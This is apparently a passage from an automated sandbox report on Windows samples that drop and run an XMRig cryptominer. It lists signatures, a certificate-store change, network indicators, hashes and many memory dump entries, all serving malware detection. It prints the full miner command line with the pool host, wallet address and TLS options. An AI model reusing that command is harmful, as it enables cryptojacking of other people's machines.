memory/2928-48-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-49-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-50-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-51-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-52-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-53-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-54-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-55-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-56-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-57-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-58-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-59-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-60-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-61-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-62-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-63-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-64-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-65-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-66-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-67-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-68-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-69-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-70-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-71-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-72-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-73-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-74-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-75-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-76-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-77-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-78-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-79-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-80-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-81-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-82-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-83-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-84-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:24
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 796 wrote to memory of 2140 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 796 wrote to memory of 2140 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2140-16-0x000002228D5B0000-0x000002228D5D0000-memory.dmp
memory/2140-17-0x000002228D600000-0x000002228D620000-memory.dmp
memory/2140-18-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-19-0x000002228D620000-0x000002228D640000-memory.dmp
memory/2140-20-0x000002228D640000-0x000002228D660000-memory.dmp
memory/2140-21-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-22-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-23-0x000002228D620000-0x000002228D640000-memory.dmp
memory/2140-25-0x000002228D640000-0x000002228D660000-memory.dmp
memory/2140-24-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-26-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-27-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-28-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-29-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-30-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-31-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-32-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-33-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-34-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-35-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-36-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-37-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-38-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-39-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-40-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-41-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-42-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-43-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-44-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-45-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-46-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-47-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-48-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-49-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-50-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-51-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-52-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-53-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-54-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-55-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-56-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-57-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-58-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-59-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-60-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-61-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-62-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-63-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-64-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-65-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-66-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-67-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-68-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-69-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-70-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-71-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-72-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-73-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-74-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-75-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-76-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-77-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-78-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-79-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-80-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-81-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-82-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-83-0x00007FF637D10000-0x00007FF638813000-memory.dmp
memory/2140-84-0x00007FF637D10000-0x00007FF638813000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:33
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 964 wrote to memory of 2484 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 964 wrote to memory of 2484 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2484-16-0x0000022B56EA0000-0x0000022B56EC0000-memory.dmp
memory/2484-17-0x0000022B588B0000-0x0000022B588D0000-memory.dmp
memory/2484-18-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-19-0x0000022B588D0000-0x0000022B588F0000-memory.dmp
memory/2484-20-0x0000022B588F0000-0x0000022B58910000-memory.dmp
memory/2484-21-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-22-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-25-0x0000022B588F0000-0x0000022B58910000-memory.dmp
memory/2484-24-0x0000022B588D0000-0x0000022B588F0000-memory.dmp
memory/2484-23-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-26-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-27-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-28-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-29-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-30-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-31-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-32-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-33-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-34-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-35-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-36-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-37-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-38-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-39-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-40-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
